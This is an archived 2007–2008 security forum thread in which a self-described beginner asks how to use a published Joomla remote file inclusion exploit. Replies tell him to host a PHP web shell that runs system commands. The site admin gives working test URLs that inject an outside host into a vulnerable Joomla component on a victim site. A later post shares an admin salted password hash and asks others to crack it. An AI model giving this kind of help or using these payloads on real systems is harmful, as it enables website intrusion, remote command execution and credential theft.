|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 91
Members: 0
Total: 91
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Joompla hack , help |
|
Posted: Fri Dec 28, 2007 8:49 am |
|
|
sran20 |
Regular user |
|
|
Joined: Oct 24, 2007 |
Posts: 5 |
|
|
|
|
|
|
|
Hello ,
I would hack a joomla with http://www.milw0rm.com/exploits/4783
but I not understund what's the =http://shell.txt?
can you say me what I can do with =http://shell.txt?.
Sorry for my english |
|
|
|
|
Posted: Fri Dec 28, 2007 10:09 am |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
http://shell.txt? is path to your eval code.Something like that <? system($cmd) ?> make acc in freewebs.com and upload code. |
|
|
|
|
Posted: Fri Dec 28, 2007 10:17 am |
|
|
sran20 |
Regular user |
|
|
Joined: Oct 24, 2007 |
Posts: 5 |
|
|
|
|
|
|
|
Someone can me give a code eval for hack of get id of admin for joomla, please because I know not eval coding. |
|
|
|
|
|
|
|
|
Posted: Fri Dec 28, 2007 4:29 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
What's your intentions? What to you mean by "hacking"? Do you want deface the website? Destroy it? Or just steal usernames and password hashes? Or just have some fun? Or hack in and use it as proxy or bouncer for another hacks? Rooting webserver? Because it seems to me, that you are absolute beginner and it's interesting to know, what you want to do with this exploit ...
Now, make this test first:
Code: |
http://victim.com/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.yahoo.com
|
If you see yahoo page within target page, then target is vulnerable.
You can try other URL-s too. If you are able to remotely include the stuff from other websites, then this exploit is working. If not, then target is patched or something else is wrong.
[[EDIT]]
I was testing this vulnerability and this is the working test:
Code: |
http://victim.com/components/com_directory/modules/mod_pxt_latest.php?mosConfig_absolute_path=http://www.yahoo.com/?xxx=
|
If you see yahoo content, then further exploiting is possible. |
|
|
|
|
|
|
|
|
Posted: Mon Feb 04, 2008 5:23 pm |
|
|
alibaba5 |
Beginner |
|
|
Joined: Feb 03, 2008 |
Posts: 3 |
|
|
|
|
|
|
|
Hi,..
i have a joomla salted hash,..
Can someone crack that??
admin:ed6f84c5e84b0f299038dd86bbb78653:G6zMb6xeP1ORIpQC
Thanks in advance |
|
|
|
|
www.waraxe.us Forum Index -> Joomla
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|